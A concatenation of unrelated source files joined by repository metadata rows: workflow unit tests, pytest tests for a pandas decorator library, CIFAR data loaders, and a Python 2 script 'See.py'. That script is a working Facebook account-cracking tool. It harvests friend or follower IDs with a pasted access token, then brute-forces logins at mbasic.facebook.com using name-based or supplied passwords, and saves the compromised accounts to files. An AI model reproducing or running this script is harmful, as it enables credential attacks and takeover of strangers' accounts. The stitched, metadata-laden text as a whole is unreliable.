self.assertEqual(staged_task["items"][1]["status"], statuses.RUNNING)
self.assertEqual(conductor.get_workflow_status(), statuses.RUNNING)
# Complete the resumed action execution.
self.forward_task_item_statuses(
conductor, task_name, 1, [statuses.SUCCEEDED], result=task_ctx["xs"][1]
)
# Assert the task is removed from staging.
self.assertIsNone(conductor.workflow_state.get_staged_task(task_name, task_route))
# Assert the task and workflow succeeded.
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.SUCCEEDED)
self.assertEqual(conductor.get_workflow_status(), statuses.SUCCEEDED)
def test_resume_partial(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Mock the action execution for each item and assert expected task statuses.
task_route = 0
task_name = "task1"
task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
task_action_specs = [
{"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
{"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
{"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
{"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
]
mock_ac_ex_statuses = [
statuses.SUCCEEDED,
statuses.PAUSED,
statuses.PAUSED,
statuses.SUCCEEDED,
]
expected_task_statuses = [
statuses.RUNNING,
statuses.PAUSING,
statuses.PAUSING,
statuses.PAUSED,
]
expected_workflow_statuses = [
statuses.RUNNING,
statuses.RUNNING,
statuses.RUNNING,
statuses.PAUSED,
]
self.assert_task_items(
conductor,
task_name,
task_route,
task_ctx,
task_ctx["xs"],
task_action_specs,
mock_ac_ex_statuses,
expected_task_statuses,
expected_workflow_statuses,
)
# Assert the task is not removed from staging.
self.assertIsNotNone(conductor.workflow_state.get_staged_task(task_name, task_route))
# Assert the workflow succeeded.
self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
# Resume the paued action execution.
self.forward_task_item_statuses(conductor, task_name, 1, [statuses.RUNNING])
# Assert the task and workflow is running.
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.RUNNING)
staged_task = conductor.workflow_state.get_staged_task(task_name, task_route)
self.assertEqual(staged_task["items"][1]["status"], statuses.RUNNING)
self.assertEqual(conductor.get_workflow_status(), statuses.RUNNING)
# Complete the resumed action execution.
self.forward_task_item_statuses(
conductor, task_name, 1, [statuses.SUCCEEDED], result=task_ctx["xs"][1]
)
# Assert the task is removed from staging.
self.assertIsNotNone(conductor.workflow_state.get_staged_task(task_name, task_route))
# Assert the task and workflow is paused.
actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
self.assertEqual(actual_task_status, statuses.PAUSED)
self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
| 34.817343
| 99
| 0.589237
| 4,007
| 37,742
| 5.306214
| 0.042176
| 0.032358
| 0.036215
| 0.040777
| 0.963033
| 0.961857
| 0.961763
| 0.961763
| 0.961763
| 0.961245
| 0
| 0.005453
| 0.300302
| 37,742
| 1,083
| 100
| 34.849492
| 0.799682
| 0.101399
| 0
| 0.916773
| 0
| 0
| 0.192436
| 0
| 0
| 0
| 0
| 0
| 0.1242
| 1
| 0.014085
| false
| 0
| 0.005122
| 0
| 0.020487
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fcd2adec202358a6aa955d1d1ca9b615d793da0e
| 7,997
|
py
|
Python
|
tests/test_decorators.py
|
dzeih/daffy
|
66d4dffebcf6a805dec418d73c6fc3890bbcf612
|
[
"MIT"
] | 11
|
2021-01-31T12:44:38.000Z
|
2021-09-29T06:26:19.000Z
|
tests/test_decorators.py
|
dzeih/daffy
|
66d4dffebcf6a805dec418d73c6fc3890bbcf612
|
[
"MIT"
] | 1
|
2021-01-31T15:09:00.000Z
|
2021-01-31T15:09:00.000Z
|
tests/test_decorators.py
|
dzeih/daffy
|
66d4dffebcf6a805dec418d73c6fc3890bbcf612
|
[
"MIT"
] | 2
|
2021-01-31T14:53:10.000Z
|
2022-03-16T12:41:18.000Z
|
import logging
from typing import Any
from unittest.mock import call
import pandas as pd
import pytest
from pytest_mock import MockerFixture
from daffy import df_in, df_log, df_out
@pytest.fixture
def basic_df() -> pd.DataFrame:
cars = {
"Brand": ["Honda Civic", "Toyota Corolla", "Ford Focus", "Audi A4"],
"Price": [22000, 25000, 27000, 35000],
}
return pd.DataFrame(cars, columns=["Brand", "Price"])
@pytest.fixture
def extended_df() -> pd.DataFrame:
cars = {
"Brand": ["Honda Civic", "Toyota Corolla", "Ford Focus", "Audi A4"],
"Price": [22000, 25000, 27000, 35000],
"Year": [2020, 1998, 2001, 2021],
}
return pd.DataFrame(cars, columns=["Brand", "Price", "Year"])
def test_wrong_return_type() -> None:
@df_out()
def test_fn() -> int:
return 1
with pytest.raises(AssertionError) as excinfo:
test_fn()
assert "Wrong return type" in str(excinfo.value)
def test_correct_return_type_and_no_column_constraints(basic_df: pd.DataFrame) -> None:
@df_out()
def test_fn() -> pd.DataFrame:
return basic_df
test_fn()
def test_correct_return_type_and_columns(basic_df: pd.DataFrame) -> None:
@df_out(columns=["Brand", "Price"])
def test_fn() -> pd.DataFrame:
return basic_df
test_fn()
def test_allow_extra_columns_out(basic_df: pd.DataFrame) -> None:
@df_out(columns=["Brand"])
def test_fn() -> pd.DataFrame:
return basic_df
test_fn()
def test_correct_return_type_and_columns_strict(basic_df: pd.DataFrame) -> None:
@df_out(columns=["Brand", "Price"], strict=True)
def test_fn() -> pd.DataFrame:
return basic_df
test_fn()
def test_extra_column_in_return_strict(basic_df: pd.DataFrame) -> None:
@df_out(columns=["Brand"], strict=True)
def test_fn() -> pd.DataFrame:
return basic_df
with pytest.raises(AssertionError) as excinfo:
test_fn()
assert "DataFrame contained unexpected column(s): Price" in str(excinfo.value)
def test_missing_column_in_return(basic_df: pd.DataFrame) -> None:
@df_out(columns=["Brand", "FooColumn"])
def test_fn() -> pd.DataFrame:
return basic_df
with pytest.raises(AssertionError) as excinfo:
test_fn()
assert "Column FooColumn missing" in str(excinfo.value)
def test_wrong_input_type_unnamed() -> None:
@df_in()
def test_fn(my_input: Any) -> Any:
return my_input
with pytest.raises(AssertionError) as excinfo:
test_fn("foobar")
assert "Wrong parameter type" in str(excinfo.value)
def test_wrong_input_type_named() -> None:
@df_in(name="my_input")
def test_fn(my_input: Any) -> Any:
return my_input
with pytest.raises(AssertionError) as excinfo:
test_fn(my_input="foobar")
assert "Wrong parameter type. Expected Pandas DataFrame, got str instead." in str(excinfo.value)
def test_correct_input_with_columns(basic_df: pd.DataFrame) -> None:
@df_in(columns=["Brand", "Price"])
def test_fn(my_input: Any) -> Any:
return my_input
test_fn(basic_df)
def test_correct_input_with_no_column_constraints(basic_df: pd.DataFrame) -> None:
@df_in()
def test_fn(my_input: Any) -> Any:
return my_input
test_fn(basic_df)
def test_dfin_with_no_inputs() -> None:
@df_in()
def test_fn() -> Any:
return
with pytest.raises(AssertionError) as excinfo:
test_fn()
assert "Wrong parameter type. Expected Pandas DataFrame, got NoneType instead." in str(excinfo.value)
def test_correct_named_input_with_columns(basic_df: pd.DataFrame) -> None:
@df_in(name="df", columns=["Brand", "Price"])
def test_fn(my_input: Any, df: pd.DataFrame) -> pd.DataFrame:
return df
test_fn("foo", df=basic_df)
def test_correct_named_input_with_columns_strict(basic_df: pd.DataFrame) -> None:
@df_in(name="df", columns=["Brand", "Price"], strict=True)
def test_fn(my_input: Any, df: pd.DataFrame) -> pd.DataFrame:
return df
test_fn("foo", df=basic_df)
def test_in_allow_extra_columns(basic_df: pd.DataFrame) -> None:
@df_in(name="df", columns=["Brand"])
def test_fn(my_input: Any, df: pd.DataFrame) -> pd.DataFrame:
return df
test_fn("foo", df=basic_df)
def test_in_strict_extra_columns(basic_df: pd.DataFrame) -> None:
@df_in(name="df", columns=["Brand"], strict=True)
def test_fn(my_input: Any, df: pd.DataFrame) -> pd.DataFrame:
return df
with pytest.raises(AssertionError) as excinfo:
test_fn("foo", df=basic_df)
assert "DataFrame contained unexpected column(s): Price" in str(excinfo.value)
def test_correct_input_with_columns_and_dtypes(basic_df: pd.DataFrame) -> None:
@df_in(columns={"Brand": "object", "Price": "int64"})
def test_fn(my_input: Any) -> Any:
return my_input
test_fn(basic_df)
def test_dtype_mismatch(basic_df: pd.DataFrame) -> None:
@df_in(columns={"Brand": "object", "Price": "float64"})
def test_fn(my_input: Any) -> Any:
return my_input
with pytest.raises(AssertionError) as excinfo:
test_fn(basic_df)
assert "Column Price has wrong dtype. Was int64, expected float64" in str(excinfo.value)
def test_df_in_incorrect_input(basic_df: pd.DataFrame) -> None:
@df_in(columns=["Brand", "Price"])
def test_fn(my_input: Any) -> Any:
return my_input
with pytest.raises(AssertionError) as excinfo:
test_fn(basic_df[["Brand"]])
assert "Column Price missing" in str(excinfo.value)
def test_df_out_with_df_modification(basic_df: pd.DataFrame, extended_df: pd.DataFrame) -> None:
@df_out(columns=["Brand", "Price", "Year"])
def test_fn(my_input: Any) -> Any:
my_input["Year"] = list(extended_df["Year"])
return my_input
assert list(basic_df.columns) == ["Brand", "Price"] # For sanity
pd.testing.assert_frame_equal(extended_df, test_fn(basic_df.copy()))
def test_decorator_combinations(basic_df: pd.DataFrame, extended_df: pd.DataFrame) -> None:
@df_in(columns=["Brand", "Price"])
@df_out(columns=["Brand", "Price", "Year"])
def test_fn(my_input: Any) -> Any:
my_input["Year"] = list(extended_df["Year"])
return my_input
pd.testing.assert_frame_equal(extended_df, test_fn(basic_df.copy()))
def test_log_df(basic_df: pd.DataFrame, mocker: MockerFixture) -> None:
@df_log()
def test_fn(foo_df: pd.DataFrame) -> pd.DataFrame:
return basic_df
mock_log = mocker.patch("daffy.decorators.logging.log")
test_fn(basic_df)
mock_log.assert_has_calls(
[
call(
logging.DEBUG,
("Function test_fn parameters contained a DataFrame: columns: ['Brand', 'Price']"),
),
call(
logging.DEBUG,
"Function test_fn returned a DataFrame: columns: ['Brand', 'Price']",
),
]
)
def test_log_df_with_dtypes(basic_df: pd.DataFrame, mocker: MockerFixture) -> None:
@df_log(include_dtypes=True)
def test_fn(foo_df: pd.DataFrame) -> pd.DataFrame:
return basic_df
mock_log = mocker.patch("daffy.decorators.logging.log")
test_fn(basic_df)
mock_log.assert_has_calls(
[
call(
logging.DEBUG,
(
"Function test_fn parameters contained a DataFrame: "
"columns: ['Brand', 'Price'] with dtypes ['object', 'int64']"
),
),
call(
logging.DEBUG,
"Function test_fn returned a DataFrame: columns: ['Brand', 'Price'] with dtypes ['object', 'int64']",
),
]
)
def test_log_non_df(mocker: MockerFixture) -> None:
@df_log()
def test_fn(foo: str) -> int:
return 123
mock_log = mocker.patch("daffy.decorators.logging.log")
test_fn("foo")
mock_log.assert_not_called()
| 28.059649
| 117
| 0.649744
| 1,089
| 7,997
| 4.51607
| 0.110193
| 0.06344
| 0.076657
| 0.0732
| 0.857056
| 0.843432
| 0.828996
| 0.786295
| 0.756405
| 0.660431
| 0
| 0.011882
| 0.221208
| 7,997
| 284
| 118
| 28.158451
| 0.777778
| 0.00125
| 0
| 0.579487
| 0
| 0.005128
| 0.148403
| 0.01052
| 0
| 0
| 0
| 0
| 0.123077
| 1
| 0.25641
| false
| 0
| 0.035897
| 0.112821
| 0.425641
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 8
|
1e099f2cc4f6249433a54cd1c87dfa8270afcc99
| 13,081
|
py
|
Python
|
See.py
|
Em710/SeeYou
|
ad4db2efe9f5f9e2befb067d6387d2d1bc8143b3
|
[
"Apache-2.0"
] | null | null | null |
See.py
|
Em710/SeeYou
|
ad4db2efe9f5f9e2befb067d6387d2d1bc8143b3
|
[
"Apache-2.0"
] | null | null | null |
See.py
|
Em710/SeeYou
|
ad4db2efe9f5f9e2befb067d6387d2d1bc8143b3
|
[
"Apache-2.0"
] | null | null | null |
#ZeeSeeYou
import requests
import sys
import os
import subprocess
import random
import time
import re
import json
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from datetime import datetime
try:
import requests
except ImportError:
os.system("pip2 install requests")
loop = 0
ok = []
cp = []
id = []
ua = ("Mozilla/5.0 (Linux; Android 4.1.3; GT-I8190N Build/GRK39F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36 [FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]")
s = requests.Session()
ct = datetime.now()
n = ct.month
bulan = ['Januari', 'Februari', 'Maret', 'April', 'Mei', 'Juni', 'Juli', 'Agustus', 'September', 'Oktober', 'Nopember', 'Desember']
try:
if n < 0 or n > 12:
exit()
nTemp = n - 1
except ValueError:
exit()
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
op = bulan[nTemp]
def logo():
os.system("clear")
print(" \033[0;91m___ ___ __ __ ___ ___ \n \033[0;91m/ __|_ _| \/ | _ ) __| \033[0;96mAU\033[0;97m : ANGGA KURNIAWAN\n\033[0;97m \__ \| || |\/| | _ \ _| \033[0;91mFB\033[0;97m : FB.ME/GAAAARZXD\n\033[0;97m |___/___|_| |_|___/_| \033[0;93mGH\033[0;97m : GITHUB.COM/ANGGAXD")
def tokenz():
os.system('clear')
print logo
token = raw_input(" Paste Access Token Here: ")
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + token)
a = json.loads(otw.text)
nama = a['name']
zedd = open('login.txt', 'w')
zedd.write(token)
zedd.close()
print '\x1b[1;92m[\xe2\x9c\x93] Login Success {^_^} '
os.system('xdg-open https://m.facebook.com/Kudiyan.Da.Prince')
time.sleep(1)
menu()
except KeyError:
print '\x1b[1;91m[!] Token Wrong !'
time.sleep(1.7)
tokenz()
def menu():
os.system('clear')
try:
token = open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
loop()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+token)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
username = a['username']
ip = requests.get('https://api-asutoolkit.cloudaccess.host/ip.php').text
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + token)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
tokenz()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mConnection Error"
loop()
logo()
print(" \033[0;97m[\033[0;96m+\033[0;97m] User Active : %s"%(nama))
print(" \033[0;97m[\033[0;96m+\033[0;97m] IP Address : "+ip)
print(" \033[0;97m[\033[0;93m#\033[0;97m] --------------------------------------------")
print(" \033[0;97m[\033[0;96m1\033[0;97m] Crack From Public FriendList")
print(" \033[0;97m[\033[0;96m2\033[0;97m] Crack From Follower")
print(" \033[0;97m[\033[0;96m3\033[0;97m] Crack From Reaction")
print(" \033[0;97m[\033[0;91m0\033[0;97m] Logout (delete token)")
ask = raw_input("\n \033[0;97m[\033[0;93m?\033[0;97m] Choose : ")
if ask =="":
menu()
elif ask == "1" or ask == "01":
public()
elif ask == "2" or ask == "02":
followers()
elif ask == "3" or ask == "03":
reaction()
elif ask == "0" or ask == "00":
os.system("rm -f login.txt")
exit(" \033[0;97m[\033[0;96m#\033[0;97m] Successfully Delete Token")
else:
menu()
def public():
global token
try:
token = open('login.txt', 'r').read()
except IOError:
print(' \033[0;97m[\033[0;91m!\033[0;97m] Token Invalid')
tokenz()
print("\n \033[0;97m[\033[0;93m*\033[0;97m] Fill In 'me' To Crack From The Friends List")
idt = raw_input(" \033[0;97m[\033[0;92m+\033[0;97m] ID Public : ")
try:
pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token)
sp = json.loads(pok.text)
#print(" \033[0;97m[\033[0;92m+\033[0;97m] Name : "+sp["name"])
except KeyError:
exit(' \033[0;97m[\033[0;91m!\033[0;97m] ID Public Not Found')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+token)
z = json.loads(r.text)
for i in z["data"]:
uid = i['id']
na = i['name']
nm = na.rsplit(" ")[0]
id.append(uid+'|'+nm)
print(" \033[0;97m[\033[0;93m*\033[0;97m] Total ID : \033[0;91m"+str(len(id)))
ask = raw_input("\n \033[0;97m[\033[0;93m?\033[0;97m] Want to Use a Manual Password? Y/t : ")
if ask == "Y" or ask == "y":
manual()
print(" \033[0;97m[\033[0;96m+\033[0;97m] Account \033[0;92mOK\033[0;97m Saved In : results/OK-%s-%s-%s.txt"% (ha, op, ta))
print(" \033[0;97m[\033[0;96m+\033[0;97m] Account \033[0;93mCP\033[0;97m Saved In : results/CP-%s-%s-%s.txt\n"% (ha, op, ta))
def main(user):
global loop, token, ips
print'\r \x1b[0;97m[\x1b[0;96m%s\x1b[0;97m] Cracking %s/%s - OK-:%s - CP-:%s ' % (datetime.now().strftime('%H:%M:%S'), loop, len(id), len(ok), len(cp)),
sys.stdout.flush()
uid,name=user.split("|")
try:
os.mkdir('results')
except OSError:
pass
try:
for pw in [name.lower()+'123',name.lower()+'1234',name.lower()+'12345',name.lower()]:
rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pw, 'login': 'submit'}, headers={'user-agent': ua})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print('\r \033[0;92m* --> ' +uid+ '|' + pw + ' ')
ok.append(uid+'|'+pw)
save = open('results/OK-%s-%s-%s.txt' % (ha, op, ta),'a')
save.write(str(uid)+'|'+str(pw)+'\n')
save.close()
break
continue
elif 'checkpoint' in xo:
print('\r \033[0;93m* --> ' +uid+ '|' + pw + ' ')
cp.append(uid+'|'+pw)
save = open('results/CP-%s-%s-%s.txt' % (ha, op, ta),'a')
save.write(str(uid)+'|'+str(pw)+'\n')
save.close()
break
continue
loop += 1
except:
pass
p = ThreadPool(30)
p.map(main, id)
exit("\n \033[0;97m[\033[0;96m#\033[0;97m] Finished")
def followers():
global token
try:
token = open('login.txt', 'r').read()
except IOError:
print(' \033[0;97m[\033[0;91m!\033[0;97m] Token Invalid')
tokenz()
print("\n \033[0;97m[\033[0;93m*\033[0;97m] Fill In 'me' To Crack From The Followers")
idt = raw_input(" \033[0;97m[\033[0;92m+\033[0;97m] ID Public : ")
try:
pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token)
sp = json.loads(pok.text)
#print(" \033[0;97m[\033[0;92m+\033[0;97m] Name : "+sp["name"])
except KeyError:
exit(' \033[0;97m[\033[0;91m!\033[0;97m] ID Public Not Found')
r = requests.get("https://graph.facebook.com/"+idt+"/subscribers?limit=5000&access_token="+token)
z = json.loads(r.text)
for i in z["data"]:
uid = i['id']
na = i['name']
nm = na.rsplit(" ")[0]
id.append(uid+'|'+nm)
print(" \033[0;97m[\033[0;93m*\033[0;97m] Total ID : \033[0;91m"+str(len(id)))
ask = raw_input("\n \033[0;97m[\033[0;93m?\033[0;97m] Want to Use a Manual Password? Y/t : ")
if ask == "Y" or ask == "y":
manual()
print(" \033[0;97m[\033[0;96m+\033[0;97m] Account \033[0;92mOK\033[0;97m Saved In : results/OK-%s-%s-%s.txt"% (ha, op, ta))
print(" \033[0;97m[\033[0;96m+\033[0;97m] Account \033[0;93mCP\033[0;97m Saved In : results/CP-%s-%s-%s.txt\n"% (ha, op, ta))
def main(user):
global loop, token
print '\r \x1b[0;97m[\x1b[0;96m%s\x1b[0;97m] Cracking %s/%s - OK-:%s - CP-:%s ' % (datetime.now().strftime('%H:%M:%S'), loop, len(id), len(ok), len(cp)),
sys.stdout.flush()
uid,name=user.split("|")
try:
os.mkdir('results')
except OSError:
pass
try:
for pw in [name.lower()+'123',name.lower()+'1234',name.lower()+'12345',name.lower()]:
rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pw, 'login': 'submit'}, headers={'user-agent': ua})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print('\r \033[0;92m* --> ' +uid+ '|' + pw + ' ')
ok.append(uid+'|'+pw)
save = open('results/OK-%s-%s-%s.txt' % (ha, op, ta),'a')
save.write(str(uid)+'|'+str(pw)+'\n')
save.close()
break
continue
elif 'checkpoint' in xo:
print('\r \033[0;93m* --> ' +uid+ '|' + pw + ' ')
cp.append(uid+'|'+pw)
save = open('results/CP-%s-%s-%s.txt' % (ha, op, ta),'a')
save.write(str(uid)+'|'+str(pw)+'\n')
save.close()
break
continue
loop += 1
except:
pass
p = ThreadPool(30)
p.map(main, id)
exit("\n \033[0;97m[\033[0;96m#\033[0;97m] Finished")
def reaction():
global token
try:
token = open('login.txt', 'r').read()
except IOError:
print(' \033[0;97m[\033[0;91m!\033[0;97m] Token Invalid')
tokenz()
print("\n \033[0;97m[\033[0;93m*\033[0;97m] Fill In 'me' To Crack From The Friends List")
idt = raw_input(" \033[0;97m[\033[0;92m+\033[0;97m] ID Public : ")
try:
pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token)
sp = json.loads(pok.text)
#print(" \033[0;97m[\033[0;92m+\033[0;97m] Name : "+sp["name"])
except KeyError:
exit(' \033[0;97m[\033[0;91m!\033[0;97m] ID Public Not Found')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+token)
z = json.loads(r.text)
for i in z["data"]:
uid = i['id']
na = i['name']
nm = na.rsplit(" ")[0]
id.append(uid+'|'+nm)
print(" \033[0;97m[\033[0;93m*\033[0;97m] Total ID : \033[0;91m"+str(len(id)))
ask = raw_input("\n \033[0;97m[\033[0;93m?\033[0;97m] Want to Use a Manual Password? Y/t : ")
if ask == "Y" or ask == "y":
manual()
print(" \033[0;97m[\033[0;96m+\033[0;97m] Account \033[0;92mOK\033[0;97m Saved In : results/OK-%s-%s-%s.txt"% (ha, op, ta))
print(" \033[0;97m[\033[0;96m+\033[0;97m] Account \033[0;93mCP\033[0;97m Saved In : results/CP-%s-%s-%s.txt\n"% (ha, op, ta))
def main(user):
global loop, token
print'\r \x1b[0;97m[\x1b[0;96m%s\x1b[0;97m] Cracking %s/%s - OK-:%s - CP-:%s ' % (datetime.now().strftime('%H:%M:%S'), loop, len(id), len(ok), len(cp)),
sys.stdout.flush()
uid,name=user.split("|")
try:
os.mkdir('results')
except OSError:
pass
try:
for pw in [name.lower()+'123',name.lower()+'1234',name.lower()+'12345',name.lower()]:
rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pw, 'login': 'submit'}, headers={'user-agent': ua})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print('\r \033[0;92m* --> ' +uid+ '|' + pw + ' ')
ok.append(uid+'|'+pw)
save = open('results/OK-%s-%s-%s.txt' % (ha, op, ta),'a')
save.write(str(uid)+'|'+str(pw)+'\n')
save.close()
break
continue
elif 'checkpoint' in xo:
print('\r \033[0;93m* --> ' +uid+ '|' + pw + ' ')
cp.append(uid+'|'+pw)
save = open('results/CP-%s-%s-%s.txt' % (ha, op, ta),'a')
save.write(str(uid)+'|'+str(pw)+'\n')
save.close()
break
continue
loop += 1
except:
pass
p = ThreadPool(30)
p.map(main, id)
exit("\n \033[0;97m[\033[0;96m#\033[0;97m] Finished")
def manual():
print(" \033[0;97m[\033[0;93m*\033[0;97m] Example : bismillah,123456,indonesia")
pw = raw_input(" \033[0;97m[\033[0;93m?\033[0;97m] Sett Password : ").split(",")
if len(pw) ==0:
exit(" \033[0;97m[\033[0;91m!\033[0;97m] Don't Be Empty")
print(" \033[0;97m[\033[0;96m+\033[0;97m] Account \033[0;92mOK\033[0;97m Saved In : results/OK-%s-%s-%s.txt"% (ha, op, ta))
print(" \033[0;97m[\033[0;96m+\033[0;97m] Account \033[0;93mCP\033[0;97m Saved In : results/CP-%s-%s-%s.txt\n"% (ha, op, ta))
def main(user):
global loop, token
print'\r \x1b[0;97m[\x1b[0;96m%s\x1b[0;97m] Cracking %s/%s - OK-:%s - CP-:%s ' % (datetime.now().strftime('%H:%M:%S'), loop, len(id), len(ok), len(cp)),
sys.stdout.flush()
uid,name=user.split("|")
try:
os.mkdir('results')
except OSError:
pass
try:
for asu in pw:
rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': asu, 'login': 'submit'}, headers={'user-agent': ua})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print('\r \033[0;92m* --> ' +uid+ '|' + asu + ' ')
ok.append(uid+'|'+asu)
save = open('results/OK-%s-%s-%s.txt' % (ha, op, ta),'a')
save.write(str(uid)+'|'+str(asu)+'\n')
save.close()
break
continue
elif 'checkpoint' in xo:
print('\r \033[0;93m* --> ' +uid+ '|' + asu + ' ')
cp.append(uid+'|'+asu)
save = open('results/CP-%s-%s-%s.txt' % (ha, op, ta),'a')
save.write(str(uid)+'|'+str(asu)+'\n')
save.close()
break
continue
loop += 1
except:
pass
p = ThreadPool(30)
p.map(main, id)
exit("\n \033[0;97m[\033[0;96m#\033[0;97m] Finished")
if __name__ == '__main__':
os.system("git pull")
tokenz()
menu()
| 35.740437
| 282
| 0.581378
| 2,177
| 13,081
| 3.458429
| 0.129995
| 0.09138
| 0.095763
| 0.062425
| 0.778058
| 0.767433
| 0.749502
| 0.736486
| 0.736486
| 0.72586
| 0
| 0.116808
| 0.179956
| 13,081
| 365
| 283
| 35.838356
| 0.585066
| 0.014907
| 0
| 0.729412
| 0
| 0.138235
| 0.435569
| 0.186695
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.047059
| 0.038235
| null | null | 0.129412
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1e12a229461df5bda1eadae17d320ce3fe74360e
| 4,324
|
py
|
Python
|
mywork/data_providers/cifar.py
|
notreal1995/once-for-all
|
be6b47173e8d365e0712bade60a7cc6495e65d8e
|
[
"Apache-2.0"
] | null | null | null |
mywork/data_providers/cifar.py
|
notreal1995/once-for-all
|
be6b47173e8d365e0712bade60a7cc6495e65d8e
|
[
"Apache-2.0"
] | null | null | null |
mywork/data_providers/cifar.py
|
notreal1995/once-for-all
|
be6b47173e8d365e0712bade60a7cc6495e65d8e
|
[
"Apache-2.0"
] | null | null | null |
import torchvision
import torch.utils.data
import torchvision.transforms as transforms
"""
CIFAR-10 and CIFAR-100 can be automatically download
CINIC-10 is available from https://github.com/BayesWatch/cinic-10
"""
class CIFAR10DataProvider:
def __init__(self, save_path=None, train_batch_size=96,
test_batch_size=256, valid_size=None,
n_worker=2, resize_scale=0.08, distort_color=None,
image_size=224, num_replicas=None, rank=None):
norm_mean = [0.49139968, 0.48215827, 0.44653124]
norm_std = [0.24703233, 0.24348505, 0.26158768]
train_transform = transforms.Compose([
# transforms.Resize(image_size, interpolation=3), # BICUBIC interpolation
transforms.RandomResizedCrop(image_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(norm_mean, norm_std),
])
valid_transform = transforms.Compose([
transforms.Resize(image_size, interpolation=3), # BICUBIC interpolation
transforms.ToTensor(),
transforms.Normalize(norm_mean, norm_std),
])
train_data = torchvision.datasets.CIFAR10(
root=save_path, train=True, download=True, transform=train_transform)
valid_data = torchvision.datasets.CIFAR10(
root=save_path, train=False, download=True, transform=valid_transform)
self.train = torch.utils.data.DataLoader(
train_data, batch_size=train_batch_size, shuffle=False,
pin_memory=True, num_workers=n_worker)
self.test = torch.utils.data.DataLoader(
valid_data, batch_size=test_batch_size, shuffle=False,
pin_memory=True, num_workers=n_worker)
class CIFAR100DataProvider:
def __init__(self, save_path=None, train_batch_size=96,
test_batch_size=256, valid_size=None,
n_worker=2, resize_scale=0.08, distort_color=None,
image_size=224, num_replicas=None, rank=None):
norm_mean = [0.49139968, 0.48215827, 0.44653124]
norm_std = [0.24703233, 0.24348505, 0.26158768]
train_transform = transforms.Compose([
# transforms.Resize(image_size, interpolation=3), # BICUBIC interpolation
transforms.RandomResizedCrop(image_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(norm_mean, norm_std),
])
valid_transform = transforms.Compose([
transforms.Resize(image_size, interpolation=3), # BICUBIC interpolation
transforms.ToTensor(),
transforms.Normalize(norm_mean, norm_std),
])
train_data = torchvision.datasets.CIFAR100(
root=save_path, train=True, download=True, transform=train_transform)
valid_data = torchvision.datasets.CIFAR100(
root=save_path, train=False, download=True, transform=valid_transform)
self.train = torch.utils.data.DataLoader(
train_data, batch_size=train_batch_size, shuffle=False,
pin_memory=True, num_workers=n_worker)
self.test = torch.utils.data.DataLoader(
valid_data, batch_size=test_batch_size, shuffle=False,
pin_memory=True, num_workers=n_worker)
#
#
# class CINIC10DataProvider:
#
# def __init__(self, save_path=None, train_batch_size=96,
